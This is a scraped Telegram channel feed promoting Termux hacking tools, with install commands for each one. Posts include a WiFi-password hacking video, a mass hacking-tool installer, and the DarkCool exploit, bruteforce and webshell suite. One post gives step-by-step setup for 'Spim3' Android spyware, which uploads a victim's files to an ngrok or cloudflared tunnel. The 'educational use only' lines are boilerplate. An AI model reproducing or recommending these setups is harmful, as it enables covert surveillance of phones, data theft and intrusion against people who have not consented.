This media is not supported in your browser
VIEW IN TELEGRAM
About info :-
In This Video We Will Teach You To Hack Wifi Password Easily And No need To download Third Party Apps.
Please open Telegram to view this post
VIEW IN TELEGRAM
π39β€4π4π―2
Media is too big
VIEW IN TELEGRAM
π13β€5
X-enc is a tool for encoding and obfuscating files in various programming languages using base64 encoding. This tool supports multiple languages such as Python, Bash, HTML, JavaScript, and PHP. With this tool, your files will be protected and hard to read by unauthorized users.
π§π»βπ» @TERMUXCOMMANDD
$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/X-enc.git
$ cd X-enc
$ bash install.sh
$ python3 X-enc.py <file>'''
Example of running tools if the file is in the sdcard directory!
$ python3 X-enc.py /sdcard/name.py
Note
Ensure your files are encoded in UTF-8 for proper obfuscation.
Obfuscation is intended for protection but is not a substitute for secure coding practices.
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
π9β€4π1
Automatic haΒ’king tools installer
π§π»βπ» @TERMUXCOMMANDD
git clone https://github.com/AnonHackerr/toolss.git
cd toolss
chmod +x Tools.py
python Tools.py
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
β€12π8
Please open Telegram to view this post
VIEW IN TELEGRAM
π11β€4
Simple Android spyware that uploads all files from user selected paths.
π§π»βπ» @TERMUXCOMMANDD
pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone http://github.com/7wp81x/Spim3
cd Spim3/
bash spim3.sh
Example usage:
- open new session
cd Files/
php -S 127.0.0.1:8000 > /dev/null 2>&1 &
- Tunnel using cloudflared
cloudflared tunnel --url 127.0.0.1:8080
- Tunnel using ngrok
ngrok http 8080
- on main session:
bash spim3.sh
- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
π9β€6
Please open Telegram to view this post
VIEW IN TELEGRAM
π6β€4
Protect Your Termux Terminal By Password
Lock Termux
π§π»βπ» @TERMUXCOMMANDD
Lock Termux
apt update
apt upgrade
apt install python2
apt install bash
apt install git
git clone https://github.com/sync-ankit/Lock-Termux
cd Lock-Termux
bash setup.sh
set you password
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
π7β€4π―3
Please open Telegram to view this post
VIEW IN TELEGRAM
π24β€9π―2
π Books β Start with The Basics of Hacking and Penetration Testing by Patrick Engebretson.π₯ YouTube Channels β Follow channels like HackerSploit and The Cyber Mentor for tutorials and tips.π₯ Online Courses β Platforms like Udemy and Coursera offer courses on ethical hacking by experts.π Websites β Explore platforms like Hack The Box and OverTheWire for hands-on hacking challenges.π° Blogs β Read blogs like HackRead and Null Byte for news, tutorials, and cybersecurity updates.π» Capture The Flag (CTF) β Participate in CTF competitions on platforms like Hack The Box and TryHackMe.π Forums β Join communities like Redditβs r/HowToHack and Stack Overflow for discussions and advice.βοΈ Tools Documentation β Study the documentation of tools like Metasploit, Nmap, and Wireshark for in-depth understanding.π₯ Webinars β Attend cybersecurity webinars hosted by professionals and organizations for insights and tips.π Certifications β Consider certifications like CEH (Certified Ethical Hacker) and OSCP (Offensive Security Certified Professional) for formal recognition.π Podcasts β Listen to cybersecurity podcasts like Darknet Diaries and Security Now for real-life hacking stories and discussions.π Whitepapers β Read cybersecurity whitepapers released by firms and researchers for in-depth analysis.πΉ Gaming β Play hacking simulation games like Hacknet and Uplink to practice hacking techniques.πΌ Networking β Connect with aspiring ethical hackers through social media and online forums.π¬ Open Source Projects β Contribute to cybersecurity projects on platforms like GitHub.
Please open Telegram to view this post
VIEW IN TELEGRAM
β€5π2
Xscanweb is a simple tool for scanning a website,This tool is designed to assist security administrators and developers in auditing website security effortlessly.
π§π»βπ» @TERMUXCOMMANDD
$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/Xscanweb.git
$ cd Xscanweb
$ bash install.sh
$ make run
Instructions
first: Install tools according to the instructions above
second: Enter the URL of a website you want to scan.
last: Click enter and the tool will automatically scan the website and show the results
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
π8β€6π―1
XTempmail is a place where you can create or check unlimited temporary emails and they will automatically check the inbox.
π§π»βπ» @TERMUXCOMMANDD
$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/XTempmail.git
$ cd XTempmail
$ bash install.sh
$ python XTempmail.py
Instructions
first: Install tools according to the instructions above
second: Copy the email that appears on the screen
third: Just send a message to the email you have copied or registered anywhere to receive the OTP
last: The tool will automatically receive incoming messages to XTempmail
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
π9β€8
How to install Truecaller in Termux
π§π»βπ» @TERMUXCOMMANDD
pkg update
pkg upgrade
apt install nodejs-lts -y
npm install -g truecallerjs -y
truecallerjs
truecallerjs login
Step 1: First of all we have to login in the truecaller js through truecallerjs login Command.
Step 2: Type the number using international format ( for india use +91 in front of your phone number.
Step 3: Now enter the OTP that has been sent to your phone number that you have typed.
Step 4: To search a phone number in termux just type truecallerjs -s {phonenumber}. (Replace {phonenumber} With the number you want to search shown in the phone number)
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
1π10β€5
Please open Telegram to view this post
VIEW IN TELEGRAM
π9
Please open Telegram to view this post
VIEW IN TELEGRAM
π7π―6β€4
DarkCool
All Tools For Hacking Activity! List:~ Exploiter, Checker, Webshell Finder, Grabber, Searching, Bruteforce, Random, And Others Tools
π§π»βπ» @TERMUXCOMMANDD
All Tools For Hacking Activity! List:~ Exploiter, Checker, Webshell Finder, Grabber, Searching, Bruteforce, Random, And Others Tools
pkg update && pkg upgrade
pkg install git
pkg install python
pip install termcolor
pip install pytube
pip install requests_oauthlib
git clone https://github.com/DarkSkull777/DarkCool.git
cd DarkCool
python setup_darkcool.py
python darkcool.py
Usage
Once DarkCool is installed, you can start using it with the following common commands:
python setup_darkcool.py: Install pip.
python darkcool.py: Run the DarkCool program.
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
π18β€6π―3
X-snifer is a versatile tool designed for scanning and gathering information from a website and simplifying various website analysis and network reconnaissance tasks.
π§π»βπ» @TERMUXCOMMANDD
$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/X-snifer.git
$ cd X-snifer
$ pip install -r requirements.txt
$ python3 X-snifer.py
Instructions
first: Install tools according to the instructions above.
second: Select one of the tools you want to use according to the numbers.
third: Follow the directions from the tool you have chosen and enter according to the directions.
last: The tool will automatically perform a scanner.
β οΈTermux tools are for educational use only. For more information about this tool, visit the GitHub link.
π§π»βπ» @TERMUXCOMMANDD
π9β€4
Please open Telegram to view this post
VIEW IN TELEGRAM
π9β€6
Please open Telegram to view this post
VIEW IN TELEGRAM
π10β€6